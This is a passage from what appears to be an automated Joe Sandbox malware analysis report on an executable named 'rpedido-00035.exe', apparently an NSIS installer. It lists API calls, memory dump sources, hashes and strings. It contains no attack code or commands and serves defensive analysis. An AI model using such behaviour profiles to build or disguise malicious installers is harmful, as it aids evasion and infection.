                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                          • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                          • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                          • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3610635477
                                                          • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                          • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                          • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                          • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                          • GetSysColor.USER32(00000000), ref: 004043E5
                                                          • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                          • SetBkMode.GDI32(?,?), ref: 004043FD
                                                          • GetSysColor.USER32(?), ref: 00404410
                                                          • SetBkColor.GDI32(?,?), ref: 00404420
                                                          • DeleteObject.GDI32(?), ref: 0040443A
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                          • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                          • lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                          • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                          • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                          • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                          • GetTickCount.KERNEL32 ref: 00402EAB
                                                          • wsprintfW.USER32 ref: 00402ED9
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                            • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,00002903), ref: 00402E6B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                          • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                          • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                          • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                          • GetMessagePos.USER32 ref: 00404D01
                                                          • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DB6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                          • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Tahoma
                                                          • API String ID: 3808545654-3580928618
                                                          • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                          • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                          • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                          • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                          APIs
                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                          • wsprintfW.USER32 ref: 00402E29
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                          • wsprintfW.USER32 ref: 00404C7A
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp$C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll
                                                          • API String ID: 3109718747-3098013398
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3355392842
                                                          APIs
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405D3A
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405DE2
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0), ref: 00405DF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                          • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                          • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                          • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053B7
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                            • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                          • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                          • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                          • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                          • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                          • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                          • Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                          • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76B72EE0,00403A00,76B73420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                          • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3355392842
                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405CD3
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405CE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
